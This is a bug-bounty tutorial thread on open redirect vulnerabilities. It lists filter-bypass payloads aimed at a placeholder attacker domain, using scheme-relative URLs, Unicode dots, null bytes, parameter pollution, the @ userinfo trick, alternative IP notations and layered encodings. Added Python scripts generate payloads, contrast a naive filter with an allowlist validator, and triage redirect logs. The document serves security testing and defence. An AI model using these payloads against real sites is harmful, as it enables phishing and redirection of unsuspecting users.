10 different techniques to Find and Bypass Open Redirect Vulnerabilities in Web Applications.
[A Thread ๐งต]
#bugbounty #bugbountytips #cybersecurity #AppSec
[1/n]
What is an Open Redirect Vulnerability?
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way, so a link on the trusted domain can send a user to a site the attacker controls.
[2/n]
Common Places to find Open Redirection:
login
register
logout
change site language
links in emails
[3/n]
For the examples, assume:
[webapp.nt] is the vulnerable app
[attacker.ed] is the attacker-controlled domain
Basic Redirect Payload:
http://webapp.nt?redirect=attacker.ed
If the app places the parameter value into the redirect target without validation, users are sent to the attacker-controlled domain ("attacker.ed").
[4/n]
URL-based redirection:
http://webapp.nt/http://attacker.ed
http://webapp.nt//http://attacker.ed
http://webapp.nt///http://attacker.ed
Some apps derive the redirect target from the request path rather than from a parameter; blindly appending an attacker-controlled URL to the path may sometimes lead to an open redirect.
[5/n]
Encoding the Dot (.):
http://webapp.nt?redirect=attacker%E3%80%82ed
%E3%80%82 is the UTF-8 percent-encoding of U+3002 (ideographic full stop), which browsers normalize to an ASCII "." when resolving the host name, so a filter that looks for the literal string "attacker.ed" never sees it. Also try the plain dot with increasing levels of URL encoding:
- Single URL encoding of . in payload (attacker%2Eed)
- Double URL encoding of . in payload (attacker%252Eed)
- Triple URL encoding of . in payload (attacker%25252Eed)
[6/n]
Using a Null Char:
http://webapp.nt?redirect=//attacker%00.ed
Mixing null characters into the payload may bypass the open redirect filter at the backend when the code that validates the value and the code that emits the Location header treat the null byte differently (one truncating at it, the other ignoring it).
[7/n]
HTTP Parameter Pollution:
Passing the same parameter twice in one request may bypass the protection when the validator reads one occurrence and the redirect uses the other (which occurrence wins depends on the framework):
http://webapp.nt?redirect=//attacker.ed&redirect=//attacker.ed
or
http://webapp.nt?redirect=webapp.nt&redirect=//attacker.ed
[8/n]
Using the @ Character:
If the app only allows redirects to its own site, the userinfo syntax can bypass the check: everything before the @ is parsed as credentials, and the host the browser actually connects to is whatever follows it.
http://webapp.nt?redirect=//webapp.nt@attacker.ed
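The following is an added example, not code from the original thread: it runs the payloads from tweets 3/n to 8/n (scheme-relative, Unicode dot, null byte, parameter pollution, userinfo) against a deliberately naive filter, shows which host a browser would actually land on, and contrasts that with an allowlist validator that rejects all of them. webapp.nt and attacker.ed are the thread's placeholder hosts; the validator design and function names are my own assumptions, not any framework's API.

```python
"""Added example, not part of the original thread: how the thread's bypass
payloads (tweets 3/n to 8/n) fool a naive redirect filter, and an allowlist
validator that rejects them. webapp.nt and attacker.ed are the thread's
placeholder hosts; the validator design is mine, not any framework's API."""
from typing import Optional
from urllib.parse import parse_qs, urljoin, urlsplit

APP_HOST = "webapp.nt"                 # the vulnerable app (thread placeholder)
BASE_URL = f"https://{APP_HOST}/"


def naive_is_safe(target: str) -> bool:
    """Weak filter seen in the wild: 'paths are fine, and so is anything that
    mentions our own host'. Scheme-relative and userinfo payloads walk past it."""
    return target.startswith("/") or APP_HOST in target


def browser_host(target: str) -> Optional[str]:
    """Host a browser lands on if the app answers `Location: <target>` verbatim:
    resolve against the app URL (RFC 3986), then IDNA-encode so a Unicode dot
    such as U+3002 becomes an ASCII '.'. Python's urljoin does not copy the
    browser quirk that reads '\\' as '/', so is_safe_redirect() bans backslashes."""
    host = urlsplit(urljoin(BASE_URL, target)).hostname
    if host is None:
        return None
    try:
        return host.encode("idna").decode("ascii")
    except UnicodeError:
        return None                     # no well-defined host


def is_safe_redirect(target: str, allowed_hosts=(APP_HOST,)) -> bool:
    """Allowlist validator: accept a same-site relative path or an absolute
    http(s) URL whose *parsed* host is allowlisted; reject everything else.
    Run it on the exact value the redirect will use, after the framework has
    URL-decoded it once, or double encoding (tweet 10/n) slips through."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in target):
        return False                    # null bytes / control chars (6/n)
    if "\\" in target:
        return False                    # browsers treat "/\evil" as "//evil"
    parts = urlsplit(target)
    if parts.scheme == "" and parts.netloc == "":
        # Relative target: exactly one leading slash. "//host" is scheme-relative
        # and would leave the site (4/n), so it must not start with two.
        return target.startswith("/") and not target.startswith("//")
    if parts.scheme not in ("http", "https"):
        return False                    # also blocks javascript:, data:, etc.
    if parts.hostname is None:
        return False
    try:                                # .hostname already drops userinfo (8/n)
        host = parts.hostname.encode("idna").decode("ascii")
    except UnicodeError:
        return False
    return host in allowed_hosts


def hpp_split(query: str):
    """Parameter pollution (7/n): the value a first-wins validator checks versus
    the value a last-wins framework actually redirects to."""
    values = parse_qs(query).get("redirect", [])
    return (values[0], values[-1]) if values else (None, None)


if __name__ == "__main__":
    payloads = [
        "attacker.ed",                  # 3/n: needs the backend to prepend a scheme
        "//attacker.ed",                # 4/n: scheme-relative
        "//attacker\u3002ed",           # 5/n: U+3002 instead of '.'
        "//attacker\x00.ed",            # 6/n: null byte (after %00 is decoded)
        "//webapp.nt@attacker.ed",      # 8/n: userinfo trick
        "/\\attacker.ed",               # browser backslash quirk
        "/account/settings",            # legitimate
        "https://webapp.nt/account",    # legitimate
    ]
    for p in payloads:
        print(f"{p!r:30} naive={naive_is_safe(p)!s:5} "
              f"hardened={is_safe_redirect(p)!s:5} browser->{browser_host(p)}")
    print("HPP (checked, used):", hpp_split("redirect=webapp.nt&redirect=//attacker.ed"))
```

The design choice worth copying is that the allowlist compares the host the URL parser extracts (after userinfo is stripped and IDNA applied), never a substring of the raw value; the naive filter fails precisely because it reasons about the string instead of the parsed host. The bare "attacker.ed" payload is only reported as on-site here because Python resolves it as a relative path; it becomes an open redirect only when the backend itself prepends "http://".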
[9/n]
Using an IP address with different notations:
Try redirecting to an IP address (instead of a domain) in notations a strict filter may not recognize but browsers still resolve: IPv6 (including the IPv4-mapped form), and IPv4 written as a single decimal number, in hex, or in octal.
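As an added example (not from the original thread), the block below generates the alternative IPv4 spellings for one address, builds the corresponding redirect payloads, and includes a small parser that emulates the legacy inet_aton() rules browsers follow, so you can confirm every form resolves to the same address while a strict validator built on Python's ipaddress module rejects all but the dotted-quad form. The address 203.0.113.10 is a constructed TEST-NET-3 value standing in for the attacker's server, and webapp.nt is the thread's placeholder.

```python
"""Added example, not part of the original thread: alternative IPv4 notations
(tweet 9/n), the payloads built from them, and an inet_aton()-style parser that
shows they all resolve to the same host. 203.0.113.10 is a constructed
TEST-NET-3 address; webapp.nt is the thread's placeholder host."""
import ipaddress

ATTACKER_IP = "203.0.113.10"   # constructed example; substitute your own host's IP


def ipv4_notations(dotted: str) -> dict:
    """Equivalent spellings of one IPv4 address. WHATWG-style URL parsers in
    browsers accept all of the IPv4 forms; the IPv6 entry is the IPv4-mapped
    address and only helps if the client actually has IPv6 connectivity."""
    addr = ipaddress.IPv4Address(dotted)
    n = int(addr)
    b = addr.packed
    return {
        "decimal":      str(n),                                  # 3405803786
        "hex":          f"0x{n:08x}",                            # 0xcb00710a
        "hex_dotted":   ".".join(f"0x{x:02x}" for x in b),       # 0xcb.0x00.0x71.0x0a
        "octal_dotted": ".".join(f"0{x:o}" for x in b),          # 0313.00.0161.012
        "short_dotted": f"{b[0]}.{b[1]}.{(b[2] << 8) | b[3]}",   # 203.0.28938
        "ipv6_mapped":  f"[::ffff:{addr}]",                      # [::ffff:203.0.113.10]
    }


def _c_number(token: str) -> int:
    """Parse one dotted component the way C's strtoul(..., 0) does:
    0x prefix = hex, leading 0 = octal, otherwise decimal."""
    if token[:2].lower() == "0x":
        return int(token[2:] or "0", 16)
    if len(token) > 1 and token[0] == "0":
        return int(token, 8)
    return int(token, 10)


def parse_legacy_ipv4(text: str) -> ipaddress.IPv4Address:
    """Emulate inet_aton(): 1 to 4 dot-separated numbers, the last of which
    fills all remaining bytes. ipaddress.IPv4Address() rejects every form
    except a.b.c.d, which is exactly why strict validators and browsers disagree."""
    parts = text.split(".")
    if not 1 <= len(parts) <= 4:
        raise ValueError("1-4 components expected")
    nums = [_c_number(p) for p in parts]
    value = 0
    for n in nums[:-1]:
        if n > 0xFF:
            raise ValueError("leading components must fit in one byte")
        value = (value << 8) | n
    tail_bytes = 4 - (len(nums) - 1)
    if nums[-1] >= 1 << (8 * tail_bytes):
        raise ValueError("last component too large")
    return ipaddress.IPv4Address((value << (8 * tail_bytes)) | nums[-1])


def strict_accepts(text: str) -> bool:
    """Verdict of a validator built on ipaddress (or most IP regexes)."""
    try:
        ipaddress.ip_address(text.strip("[]"))
        return True
    except ValueError:
        return False


def redirect_payloads(vuln_url: str = "http://webapp.nt/?redirect=", ip: str = ATTACKER_IP) -> dict:
    """One thread-style payload per notation."""
    return {name: f"{vuln_url}http://{form}/" for name, form in ipv4_notations(ip).items()}


if __name__ == "__main__":
    for name, form in ipv4_notations(ATTACKER_IP).items():
        if name == "ipv6_mapped":
            resolved = ipaddress.ip_address(form.strip("[]")).ipv4_mapped
        else:
            resolved = parse_legacy_ipv4(form)
        print(f"{name:13} {form:24} strict={strict_accepts(form)!s:5} legacy->{resolved}")
    for payload in redirect_payloads().values():
        print(payload)
```

The practical check is the mismatch the script prints: a validator that calls ipaddress.ip_address (or a dotted-quad regex) says "not an IP" for the decimal, hex, octal and short forms, while the inet_aton emulation, like the browser, resolves each of them to 203.0.113.10. If the filter compares the parsed host against an IP denylist, these forms sail past it.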
[10/n]
Encoding Techniques:
Apply the following encodings to the payload if it is blocked server-side:
URL encoded
Double URL encoded
Hex encoded
Mixed encoding
Base64 encoded (where the app decodes the parameter before using it)
[11/n]
HTTP redirect status codes:
Responses with the following status codes carry a Location header, so the requests that produce them are worth checking for open redirects:
301 Moved Permanently
302 Found
303 See Other
307 Temporary Redirect
308 Permanent Redirect
304 Not Modified is a cache validation response and 305 Use Proxy is deprecated; neither sends the browser anywhere, so they are not useful signals here.
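To turn the status-code hint into something you can run over proxy or crawler output, here is an added example (not from the original thread) that labels each request/response pair: a 3xx redirect whose Location resolves off-site and reflects a query-string value is flagged as a candidate, an on-site redirect that reflects a query value is flagged as worth fuzzing with the bypasses above, and everything else is ignored. The log entries are constructed, and webapp.nt / attacker.ed are the thread's placeholder hosts.

```python
"""Added example, not part of the original thread: triage of captured
request/response pairs for redirects influenced by a query parameter.
SAMPLE_LOG is constructed; webapp.nt and attacker.ed are the thread's
placeholder hosts."""
from typing import Optional
from urllib.parse import parse_qsl, urljoin, urlsplit

APP_HOST = "webapp.nt"
# Codes that carry a Location header. 304 is a cache response and 305 is
# deprecated, so neither belongs here.
REDIRECT_CODES = {301, 302, 303, 307, 308}

# Constructed sample: (request URL, status code, Location header or None)
SAMPLE_LOG = [
    ("http://webapp.nt/login?redirect=//attacker.ed", 302, "//attacker.ed"),
    ("http://webapp.nt/login?redirect=/account", 302, "/account"),
    ("http://webapp.nt/old-page", 301, "https://webapp.nt/new-page"),
    ("http://webapp.nt/static/app.js", 304, None),
    ("http://webapp.nt/lang?to=fr&next=http://attacker.ed", 303, "http://attacker.ed"),
    ("http://webapp.nt/logout?next=https://webapp.nt@attacker.ed", 307,
     "https://webapp.nt@attacker.ed"),
]


def classify(request_url: str, status: int, location: Optional[str]) -> str:
    """Label one request/response pair.

    open-redirect-candidate     : redirect, off-site host, and a query value is
                                  reflected in Location (report this)
    parameter-controls-location : redirect stays on-site but a query value is
                                  reflected, so the filter is worth fuzzing
    redirect                    : redirect not influenced by any query value
    not-a-redirect              : no Location to follow
    """
    if status not in REDIRECT_CODES or not location:
        return "not-a-redirect"
    # Resolve the way a browser would, so "//attacker.ed" and "x@attacker.ed"
    # are attributed to the host the user really lands on.
    target_host = urlsplit(urljoin(request_url, location)).hostname
    query_values = [v for _, v in parse_qsl(urlsplit(request_url).query) if v]
    reflected = any(v in location for v in query_values)
    if reflected and target_host != APP_HOST:
        return "open-redirect-candidate"
    if reflected:
        return "parameter-controls-location"
    return "redirect"


def triage(entries):
    """Return only the entries that need a human, with their label."""
    out = []
    for url, status, location in entries:
        label = classify(url, status, location)
        if label in ("open-redirect-candidate", "parameter-controls-location"):
            out.append((label, url))
    return out


if __name__ == "__main__":
    for label, url in triage(SAMPLE_LOG):
        print(f"{label:28} {url}")
```

Two caveats when running this on real traffic: very short parameter values (a two-letter language code, for example) will match almost any Location by substring, so raise the minimum length or compare parsed components instead; and a redirect that stays on-site is still the interesting one to attack with the @, scheme-relative and encoding tricks from the thread, which is why it gets its own label rather than being dropped.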